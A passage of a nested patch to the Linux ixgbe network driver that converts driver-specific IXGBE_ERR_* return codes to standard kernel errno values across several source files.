+-			status = IXGBE_ERR_I2C;
++			status = -EIO;
+ 			goto release_i2c_access;
+ 		}
+ 	}
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c
+index 38c4609bd4292..5688a6ad4b3b2 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c
+@@ -124,7 +124,7 @@ s32 ixgbe_setup_fc_generic(struct ixgbe_hw *hw)
+ 	 */
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_dbg(hw, "ixgbe_fc_rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	/*
+@@ -215,7 +215,7 @@ s32 ixgbe_setup_fc_generic(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_dbg(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	if (hw->mac.type != ixgbe_mac_X540) {
+@@ -500,7 +500,7 @@ s32 ixgbe_read_pba_string_generic(struct ixgbe_hw *hw, u8 *pba_num,
+ 
+ 	if (pba_num == NULL) {
+ 		hw_dbg(hw, "PBA string buffer was null\n");
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	ret_val = hw->eeprom.ops.read(hw, IXGBE_PBANUM0_PTR, &data);
+@@ -526,7 +526,7 @@ s32 ixgbe_read_pba_string_generic(struct ixgbe_hw *hw, u8 *pba_num,
+ 		/* we will need 11 characters to store the PBA */
+ 		if (pba_num_size < 11) {
+ 			hw_dbg(hw, "PBA string buffer too small\n");
+-			return IXGBE_ERR_NO_SPACE;
++			return -ENOSPC;
+ 		}
+ 
+ 		/* extract hex string from data and pba_ptr */
+@@ -563,13 +563,13 @@ s32 ixgbe_read_pba_string_generic(struct ixgbe_hw *hw, u8 *pba_num,
+ 
+ 	if (length == 0xFFFF || length == 0) {
+ 		hw_dbg(hw, "NVM PBA number section invalid length\n");
+-		return IXGBE_ERR_PBA_SECTION;
++		return -EIO;
+ 	}
+ 
+ 	/* check if pba_num buffer is big enough */
+ 	if (pba_num_size  < (((u32)length * 2) - 1)) {
+ 		hw_dbg(hw, "PBA string buffer too small\n");
+-		return IXGBE_ERR_NO_SPACE;
++		return -ENOSPC;
+ 	}
+ 
+ 	/* trim pba length from start of string */
+@@ -805,7 +805,7 @@ s32 ixgbe_led_on_generic(struct ixgbe_hw *hw, u32 index)
+ 	u32 led_reg = IXGBE_READ_REG(hw, IXGBE_LEDCTL);
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn on the LED, set mode to ON. */
+ 	led_reg &= ~IXGBE_LED_MODE_MASK(index);
+@@ -826,7 +826,7 @@ s32 ixgbe_led_off_generic(struct ixgbe_hw *hw, u32 index)
+ 	u32 led_reg = IXGBE_READ_REG(hw, IXGBE_LEDCTL);
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn off the LED, set mode to OFF. */
+ 	led_reg &= ~IXGBE_LED_MODE_MASK(index);
+@@ -904,11 +904,8 @@ s32 ixgbe_write_eeprom_buffer_bit_bang_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset + words > hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || (offset + words > hw->eeprom.word_size))
++		return -EINVAL;
+ 
+ 	/*
+ 	 * The EEPROM page size cannot be queried from the chip. We do lazy
+@@ -962,7 +959,7 @@ static s32 ixgbe_write_eeprom_buffer_bit_bang(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	if (ixgbe_ready_eeprom(hw) != 0) {
+ 		ixgbe_release_eeprom(hw);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	for (i = 0; i < words; i++) {
+@@ -1028,7 +1025,7 @@ s32 ixgbe_write_eeprom_generic(struct ixgbe_hw *hw, u16 offset, u16 data)
+ 	hw->eeprom.ops.init_params(hw);
+ 
+ 	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++		return -EINVAL;
+ 
+ 	return ixgbe_write_eeprom_buffer_bit_bang(hw, offset, 1, &data);
+ }
+@@ -1050,11 +1047,8 @@ s32 ixgbe_read_eeprom_buffer_bit_bang_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset + words > hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || (offset + words > hw->eeprom.word_size))
++		return -EINVAL;
+ 
+ 	/*
+ 	 * We cannot hold synchronization semaphores for too long
+@@ -1099,7 +1093,7 @@ static s32 ixgbe_read_eeprom_buffer_bit_bang(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	if (ixgbe_ready_eeprom(hw) != 0) {
+ 		ixgbe_release_eeprom(hw);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	for (i = 0; i < words; i++) {
+@@ -1142,7 +1136,7 @@ s32 ixgbe_read_eeprom_bit_bang_generic(struct ixgbe_hw *hw, u16 offset,
+ 	hw->eeprom.ops.init_params(hw);
+ 
+ 	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++		return -EINVAL;
+ 
+ 	return ixgbe_read_eeprom_buffer_bit_bang(hw, offset, 1, data);
+ }
+@@ -1165,11 +1159,8 @@ s32 ixgbe_read_eerd_buffer_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || offset >= hw->eeprom.word_size)
++		return -EINVAL;
+ 
+ 	for (i = 0; i < words; i++) {
+ 		eerd = ((offset + i) << IXGBE_EEPROM_RW_ADDR_SHIFT) |
+@@ -1262,11 +1253,8 @@ s32 ixgbe_write_eewr_buffer_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || offset >= hw->eeprom.word_size)
++		return -EINVAL;
+ 
+ 	for (i = 0; i < words; i++) {
+ 		eewr = ((offset + i) << IXGBE_EEPROM_RW_ADDR_SHIFT) |
+@@ -1328,7 +1316,7 @@ static s32 ixgbe_poll_eerd_eewr_done(struct ixgbe_hw *hw, u32 ee_reg)
+ 		}
+ 		udelay(5);
+ 	}
+-	return IXGBE_ERR_EEPROM;
++	return -EIO;
+ }
+ 
+ /**
+@@ -1344,7 +1332,7 @@ static s32 ixgbe_acquire_eeprom(struct ixgbe_hw *hw)
+ 	u32 i;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM) != 0)
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	eec = IXGBE_READ_REG(hw, IXGBE_EEC(hw));
+ 
+@@ -1366,7 +1354,7 @@ static s32 ixgbe_acquire_eeprom(struct ixgbe_hw *hw)
+ 		hw_dbg(hw, "Could not acquire EEPROM grant\n");
+ 
+ 		hw->mac.ops.release_swfw_sync(hw, IXGBE_GSSR_EEP_SM);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	/* Setup EEPROM for Read/Write */
+@@ -1419,7 +1407,7 @@ static s32 ixgbe_get_eeprom_semaphore(struct ixgbe_hw *hw)
+ 		swsm = IXGBE_READ_REG(hw, IXGBE_SWSM(hw));
+ 		if (swsm & IXGBE_SWSM_SMBI) {
+ 			hw_dbg(hw, "Software semaphore SMBI between device drivers not granted.\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -1447,7 +1435,7 @@ static s32 ixgbe_get_eeprom_semaphore(struct ixgbe_hw *hw)
+ 	if (i >= timeout) {
+ 		hw_dbg(hw, "SWESMBI Software EEPROM semaphore not granted.\n");
+ 		ixgbe_release_eeprom_semaphore(hw);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -1503,7 +1491,7 @@ static s32 ixgbe_ready_eeprom(struct ixgbe_hw *hw)
+ 	 */
+ 	if (i >= IXGBE_EEPROM_MAX_RETRY_SPI) {
+ 		hw_dbg(hw, "SPI EEPROM Status error\n");
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -1715,7 +1703,7 @@ s32 ixgbe_calc_eeprom_checksum_generic(struct ixgbe_hw *hw)
+ 	for (i = IXGBE_PCIE_ANALOG_PTR; i < IXGBE_FW_PTR; i++) {
+ 		if (hw->eeprom.ops.read(hw, i, &pointer)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 
+ 		/* If the pointer seems invalid */
+@@ -1724,7 +1712,7 @@ s32 ixgbe_calc_eeprom_checksum_generic(struct ixgbe_hw *hw)
+ 
+ 		if (hw->eeprom.ops.read(hw, pointer, &length)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 
+ 		if (length == 0xFFFF || length == 0)
+@@ -1733,7 +1721,7 @@ s32 ixgbe_calc_eeprom_checksum_generic(struct ixgbe_hw *hw)
+ 		for (j = pointer + 1; j <= pointer + length; j++) {
+ 			if (hw->eeprom.ops.read(hw, j, &word)) {
+ 				hw_dbg(hw, "EEPROM read failed\n");
+-				return IXGBE_ERR_EEPROM;
++				return -EIO;
+ 			}
+ 			checksum += word;
+ 		}
+@@ -1786,7 +1774,7 @@ s32 ixgbe_validate_eeprom_checksum_generic(struct ixgbe_hw *hw,
+ 	 * calculated checksum
+ 	 */
+ 	if (read_checksum != checksum)
+-		status = IXGBE_ERR_EEPROM_CHECKSUM;
++		status = -EIO;
+ 
+ 	/* If the user cares, return the calculated checksum */
+ 	if (checksum_val)
+@@ -1845,7 +1833,7 @@ s32 ixgbe_set_rar_generic(struct ixgbe_hw *hw, u32 index, u8 *addr, u32 vmdq,
+ 	/* Make sure we are using a valid rar index range */
+ 	if (index >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", index);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	/* setup VMDq pool selection before this RAR gets enabled */
+@@ -1897,7 +1885,7 @@ s32 ixgbe_clear_rar_generic(struct ixgbe_hw *hw, u32 index)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (index >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", index);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	/*
+@@ -2146,7 +2134,7 @@ s32 ixgbe_fc_enable_generic(struct ixgbe_hw *hw)
+ 
+ 	/* Validate the water mark configuration. */
+ 	if (!hw->fc.pause_time)
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 
+ 	/* Low water mark of zero causes XOFF floods */
+ 	for (i = 0; i < MAX_TRAFFIC_CLASS; i++) {
+@@ -2155,7 +2143,7 @@ s32 ixgbe_fc_enable_generic(struct ixgbe_hw *hw)
+ 			if (!hw->fc.low_water[i] ||
+ 			    hw->fc.low_water[i] >= hw->fc.high_water[i]) {
+ 				hw_dbg(hw, "Invalid water mark configuration\n");
+-				return IXGBE_ERR_INVALID_LINK_SETTINGS;
++				return -EINVAL;
+ 			}
+ 		}
+ 	}
+@@ -2212,7 +2200,7 @@ s32 ixgbe_fc_enable_generic(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_dbg(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* Set 802.3x based flow control settings. */
+@@ -2269,7 +2257,7 @@ s32 ixgbe_negotiate_fc(struct ixgbe_hw *hw, u32 adv_reg, u32 lp_reg,
+ 		       u32 adv_sym, u32 adv_asm, u32 lp_sym, u32 lp_asm)
+ {
+ 	if ((!(adv_reg)) ||  (!(lp_reg)))
+-		return IXGBE_ERR_FC_NOT_NEGOTIATED;
++		return -EINVAL;
+ 
+ 	if ((adv_reg & adv_sym) && (lp_reg & lp_sym)) {
+ 		/*
+@@ -2321,7 +2309,7 @@ static s32 ixgbe_fc_autoneg_fiber(struct ixgbe_hw *hw)
+ 	linkstat = IXGBE_READ_REG(hw, IXGBE_PCS1GLSTA);
+ 	if ((!!(linkstat & IXGBE_PCS1GLSTA_AN_COMPLETE) == 0) ||
+ 	    (!!(linkstat & IXGBE_PCS1GLSTA_AN_TIMED_OUT) == 1))
+-		return IXGBE_ERR_FC_NOT_NEGOTIATED;
++		return -EIO;
+ 
+ 	pcs_anadv_reg = IXGBE_READ_REG(hw, IXGBE_PCS1GANA);
+ 	pcs_lpab_reg = IXGBE_READ_REG(hw, IXGBE_PCS1GANLP);
+@@ -2353,12 +2341,12 @@ static s32 ixgbe_fc_autoneg_backplane(struct ixgbe_hw *hw)
+ 	 */
+ 	links = IXGBE_READ_REG(hw, IXGBE_LINKS);
+ 	if ((links & IXGBE_LINKS_KX_AN_COMP) == 0)
+-		return IXGBE_ERR_FC_NOT_NEGOTIATED;
++		return -EIO;
+ 
+ 	if (hw->mac.type == ixgbe_mac_82599EB) {
+ 		links2 = IXGBE_READ_REG(hw, IXGBE_LINKS2);
+ 		if ((links2 & IXGBE_LINKS2_AN_SUPPORTED) == 0)
+-			return IXGBE_ERR_FC_NOT_NEGOTIATED;
++			return -EIO;
+ 	}
+ 	/*
+ 	 * Read the 10g AN autoc and LP ability registers and resolve
+@@ -2407,8 +2395,8 @@ static s32 ixgbe_fc_autoneg_copper(struct ixgbe_hw *hw)
+  **/
+ void ixgbe_fc_autoneg(struct ixgbe_hw *hw)
+ {
+-	s32 ret_val = IXGBE_ERR_FC_NOT_NEGOTIATED;
+ 	ixgbe_link_speed speed;
++	s32 ret_val = -EIO;
+ 	bool link_up;
+ 
+ 	/*
+@@ -2510,7 +2498,7 @@ static u32 ixgbe_pcie_timeout_poll(struct ixgbe_hw *hw)
+  *  @hw: pointer to hardware structure
+  *
+  *  Disables PCI-Express primary access and verifies there are no pending
+- *  requests. IXGBE_ERR_PRIMARY_REQUESTS_PENDING is returned if primary disable
++ *  requests. -EALREADY is returned if primary disable
+  *  bit hasn't caused the primary requests to be disabled, else 0
+  *  is returned signifying primary requests disabled.
+  **/
+@@ -2575,7 +2563,7 @@ gio_disable_fail:
+ 	}
+ 
+ 	hw_dbg(hw, "PCIe transaction pending bit also did not clear.\n");
+-	return IXGBE_ERR_PRIMARY_REQUESTS_PENDING;
++	return -EALREADY;
+ }
+ 
+ /**
+@@ -2600,7 +2588,7 @@ s32 ixgbe_acquire_swfw_sync(struct ixgbe_hw *hw, u32 mask)
+ 		 * SW_FW_SYNC bits (not just NVM)
+ 		 */
+ 		if (ixgbe_get_eeprom_semaphore(hw))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		gssr = IXGBE_READ_REG(hw, IXGBE_GSSR);
+ 		if (!(gssr & (fwmask | swmask))) {
+@@ -2620,7 +2608,7 @@ s32 ixgbe_acquire_swfw_sync(struct ixgbe_hw *hw, u32 mask)
+ 		ixgbe_release_swfw_sync(hw, gssr & (fwmask | swmask));
+ 
+ 	usleep_range(5000, 10000);
+-	return IXGBE_ERR_SWFW_SYNC;
++	return -EBUSY;
+ }
+ 
+ /**
+@@ -2757,7 +2745,7 @@ s32 ixgbe_blink_led_start_generic(struct ixgbe_hw *hw, u32 index)
+ 	s32 ret_val;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/*
+ 	 * Link must be up to auto-blink the LEDs;
+@@ -2803,7 +2791,7 @@ s32 ixgbe_blink_led_stop_generic(struct ixgbe_hw *hw, u32 index)
+ 	s32 ret_val;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	ret_val = hw->mac.ops.prot_autoc_read(hw, &locked, &autoc_reg);
+ 	if (ret_val)
+@@ -2963,7 +2951,7 @@ s32 ixgbe_clear_vmdq_generic(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	mpsar_lo = IXGBE_READ_REG(hw, IXGBE_MPSAR_LO(rar));
+@@ -3014,7 +3002,7 @@ s32 ixgbe_set_vmdq_generic(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	if (vmdq < 32) {
+@@ -3091,7 +3079,7 @@ static s32 ixgbe_find_vlvf_slot(struct ixgbe_hw *hw, u32 vlan, bool vlvf_bypass)
+ 	 * will simply bypass the VLVF if there are no entries present in the
+ 	 * VLVF that contain our VLAN
+ 	 */
+-	first_empty_slot = vlvf_bypass ? IXGBE_ERR_NO_SPACE : 0;
++	first_empty_slot = vlvf_bypass ? -ENOSPC : 0;
+ 
+ 	/* add VLAN enable bit for comparison */
+ 	vlan |= IXGBE_VLVF_VIEN;
+@@ -3115,7 +3103,7 @@ static s32 ixgbe_find_vlvf_slot(struct ixgbe_hw *hw, u32 vlan, bool vlvf_bypass)
+ 	if (!first_empty_slot)
+ 		hw_dbg(hw, "No space in VLVF.\n");
+ 
+-	return first_empty_slot ? : IXGBE_ERR_NO_SPACE;
++	return first_empty_slot ? : -ENOSPC;
+ }
+ 
+ /**
+@@ -3135,7 +3123,7 @@ s32 ixgbe_set_vfta_generic(struct ixgbe_hw *hw, u32 vlan, u32 vind,
+ 	s32 vlvf_index;
+ 
+ 	if ((vlan > 4095) || (vind > 63))
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/*
+ 	 * this is a 2 part operation - first the VFTA, then the
+@@ -3596,7 +3584,8 @@ u8 ixgbe_calculate_checksum(u8 *buffer, u32 length)
+  *
+  *  Communicates with the manageability block. On success return 0
+  *  else returns semaphore error when encountering an error acquiring
+- *  semaphore or IXGBE_ERR_HOST_INTERFACE_COMMAND when command fails.
++ *  semaphore, -EINVAL when incorrect parameters passed or -EIO when
++ *  command fails.
+  *
+  *  This function assumes that the IXGBE_GSSR_SW_MNG_SM semaphore is held
+  *  by the caller.
+@@ -3609,7 +3598,7 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+ 
+ 	if (!length || length > IXGBE_HI_MAX_BLOCK_BYTE_LENGTH) {
+ 		hw_dbg(hw, "Buffer length failure buffersize-%d.\n", length);
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EINVAL;
+ 	}
+ 
+ 	/* Set bit 9 of FWSTS clearing FW reset indication */
+@@ -3620,13 +3609,13 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+ 	hicr = IXGBE_READ_REG(hw, IXGBE_HICR);
+ 	if (!(hicr & IXGBE_HICR_EN)) {
+ 		hw_dbg(hw, "IXGBE_HOST_EN bit disabled.\n");
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EIO;
+ 	}
+ 
+ 	/* Calculate length in DWORDs. We must be DWORD aligned */
+ 	if (length % sizeof(u32)) {
+ 		hw_dbg(hw, "Buffer length failure, not aligned to dword");
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	dword_len = length >> 2;
+@@ -3651,7 +3640,7 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+ 	/* Check command successful completion. */
+ 	if ((timeout && i == timeout) ||
+ 	    !(IXGBE_READ_REG(hw, IXGBE_HICR) & IXGBE_HICR_SV))
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EIO;
+ 
+ 	return 0;
+ }
+@@ -3671,7 +3660,7 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+  *  in these cases.
+  *
+  *  Communicates with the manageability block.  On success return 0
+- *  else return IXGBE_ERR_HOST_INTERFACE_COMMAND.
++ *  else return -EIO or -EINVAL.
+  **/
+ s32 ixgbe_host_interface_command(struct ixgbe_hw *hw, void *buffer,
+ 				 u32 length, u32 timeout,
+@@ -3686,7 +3675,7 @@ s32 ixgbe_host_interface_command(struct ixgbe_hw *hw, void *buffer,
+ 
+ 	if (!length || length > IXGBE_HI_MAX_BLOCK_BYTE_LENGTH) {
+ 		hw_dbg(hw, "Buffer length failure buffersize-%d.\n", length);
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EINVAL;
+ 	}
+ 	/* Take management host interface semaphore */
+ 	status = hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_SW_MNG_SM);
+@@ -3716,7 +3705,7 @@ s32 ixgbe_host_interface_command(struct ixgbe_hw *hw, void *buffer,
+ 
+ 	if (length < round_up(buf_len, 4) + hdr_size) {
+ 		hw_dbg(hw, "Buffer not large enough for reply message.\n");
+-		status = IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		status = -EIO;
+ 		goto rel_out;
+ 	}
+ 
+@@ -3747,8 +3736,8 @@ rel_out:
+  *
+  *  Sends driver version number to firmware through the manageability
+  *  block.  On success return 0
+- *  else returns IXGBE_ERR_SWFW_SYNC when encountering an error acquiring
+- *  semaphore or IXGBE_ERR_HOST_INTERFACE_COMMAND when command fails.
++ *  else returns -EBUSY when encountering an error acquiring
++ *  semaphore or -EIO when command fails.
+  **/
+ s32 ixgbe_set_fw_drv_ver_generic(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 				 u8 build, u8 sub, __always_unused u16 len,
+@@ -3784,7 +3773,7 @@ s32 ixgbe_set_fw_drv_ver_generic(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 		    FW_CEM_RESP_STATUS_SUCCESS)
+ 			ret_val = 0;
+ 		else
+-			ret_val = IXGBE_ERR_HOST_INTERFACE_COMMAND;
++			ret_val = -EIO;
+ 
+ 		break;
+ 	}
+@@ -3882,14 +3871,14 @@ static s32 ixgbe_get_ets_data(struct ixgbe_hw *hw, u16 *ets_cfg,
+ 		return status;
+ 
+ 	if ((*ets_offset == 0x0000) || (*ets_offset == 0xFFFF))
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	status = hw->eeprom.ops.read(hw, *ets_offset, ets_cfg);
+ 	if (status)
+ 		return status;
+ 
+ 	if ((*ets_cfg & IXGBE_ETS_TYPE_MASK) != IXGBE_ETS_TYPE_EMC_SHIFTED)
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	return 0;
+ }
+@@ -3912,7 +3901,7 @@ s32 ixgbe_get_thermal_sensor_data_generic(struct ixgbe_hw *hw)
+ 
+ 	/* Only support thermal sensors attached to physical port 0 */
+ 	if ((IXGBE_READ_REG(hw, IXGBE_STATUS) & IXGBE_STATUS_LAN_ID_1))
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	status = ixgbe_get_ets_data(hw, &ets_cfg, &ets_offset);
+ 	if (status)
+@@ -3972,7 +3961,7 @@ s32 ixgbe_init_thermal_sensor_thresh_generic(struct ixgbe_hw *hw)
+ 
+ 	/* Only support thermal sensors attached to physical port 0 */
+ 	if ((IXGBE_READ_REG(hw, IXGBE_STATUS) & IXGBE_STATUS_LAN_ID_1))
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	status = ixgbe_get_ets_data(hw, &ets_cfg, &ets_offset);
+ 	if (status)
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+index 0051aa676e19e..f8e65e18284ee 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+@@ -3339,7 +3339,7 @@ static int ixgbe_get_module_eeprom(struct net_device *dev,
+ {
+ 	struct ixgbe_adapter *adapter = netdev_priv(dev);
+ 	struct ixgbe_hw *hw = &adapter->hw;
+-	s32 status = IXGBE_ERR_PHY_ADDR_INVALID;
++	s32 status = -EFAULT;
+ 	u8 databyte = 0xFF;
+ 	int i = 0;
+ 
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 9e0e13638c463..6dc554e810a17 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -2764,7 +2764,6 @@ static void ixgbe_check_overtemp_subtask(struct ixgbe_adapter *adapter)
+ {
+ 	struct ixgbe_hw *hw = &adapter->hw;
+ 	u32 eicr = adapter->interrupt_event;
+-	s32 rc;
+ 
+ 	if (test_bit(__IXGBE_DOWN, &adapter->state))
+ 		return;
+@@ -2798,14 +2797,13 @@ static void ixgbe_check_overtemp_subtask(struct ixgbe_adapter *adapter)
+ 		}
+ 
+ 		/* Check if this is not due to overtemp */
+-		if (hw->phy.ops.check_overtemp(hw) != IXGBE_ERR_OVERTEMP)
++		if (!hw->phy.ops.check_overtemp(hw))
+ 			return;
+ 
+ 		break;
+ 	case IXGBE_DEV_ID_X550EM_A_1G_T:
+ 	case IXGBE_DEV_ID_X550EM_A_1G_T_L:
+-		rc = hw->phy.ops.check_overtemp(hw);
+-		if (rc != IXGBE_ERR_OVERTEMP)
++		if (!hw->phy.ops.check_overtemp(hw))
+ 			return;
+ 		break;
+ 	default:
+@@ -5520,7 +5518,7 @@ static int ixgbe_non_sfp_link_config(struct ixgbe_hw *hw)
+ {
+ 	u32 speed;
+ 	bool autoneg, link_up = false;
+-	int ret = IXGBE_ERR_LINK_SETUP;
++	int ret = -EIO;
+ 
+ 	if (hw->mac.ops.check_link)
+ 		ret = hw->mac.ops.check_link(hw, &speed, &link_up, false);
+@@ -5991,13 +5989,13 @@ void ixgbe_reset(struct ixgbe_adapter *adapter)
+ 	err = hw->mac.ops.init_hw(hw);
+ 	switch (err) {
+ 	case 0:
+-	case IXGBE_ERR_SFP_NOT_PRESENT:
+-	case IXGBE_ERR_SFP_NOT_SUPPORTED:
++	case -ENOENT:
++	case -EOPNOTSUPP:
+ 		break;
+-	case IXGBE_ERR_PRIMARY_REQUESTS_PENDING:
++	case -EALREADY:
+ 		e_dev_err("primary disable timed out\n");
+ 		break;
+-	case IXGBE_ERR_EEPROM_VERSION:
++	case -EACCES:
+ 		/* We are running on a pre-production device, log a warning */
+ 		e_dev_warn("This device is a pre-production adapter/LOM. "
+ 			   "Please be aware there may be issues associated with "
+@@ -7837,10 +7835,10 @@ static void ixgbe_sfp_detection_subtask(struct ixgbe_adapter *adapter)
+ 	adapter->sfp_poll_time = jiffies + IXGBE_SFP_POLL_JIFFIES - 1;
+ 
+ 	err = hw->phy.ops.identify_sfp(hw);
+-	if (err == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (err == -EOPNOTSUPP)
+ 		goto sfp_out;
+ 
+-	if (err == IXGBE_ERR_SFP_NOT_PRESENT) {
++	if (err == -ENOENT) {
+ 		/* If no cable is present, then we need to reset
+ 		 * the next time we find a good cable. */
+ 		adapter->flags2 |= IXGBE_FLAG2_SFP_NEEDS_RESET;
+@@ -7866,7 +7864,7 @@ static void ixgbe_sfp_detection_subtask(struct ixgbe_adapter *adapter)
+ 	else
+ 		err = hw->mac.ops.setup_sfp(hw);
+ 
+-	if (err == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (err == -EOPNOTSUPP)
+ 		goto sfp_out;
+ 
+ 	adapter->flags |= IXGBE_FLAG_NEED_LINK_CONFIG;
+@@ -7875,8 +7873,8 @@ static void ixgbe_sfp_detection_subtask(struct ixgbe_adapter *adapter)
+ sfp_out:
+ 	clear_bit(__IXGBE_IN_SFP_INIT, &adapter->state);
+ 
+-	if ((err == IXGBE_ERR_SFP_NOT_SUPPORTED) &&
+-	    (adapter->netdev->reg_state == NETREG_REGISTERED)) {
++	if (err == -EOPNOTSUPP &&
++	    adapter->netdev->reg_state == NETREG_REGISTERED) {
+ 		e_dev_err("failed to initialize because an unsupported "
+ 			  "SFP+ module type was detected.\n");
+ 		e_dev_err("Reload the driver after installing a "
+@@ -7946,7 +7944,7 @@ static void ixgbe_service_timer(struct timer_list *t)
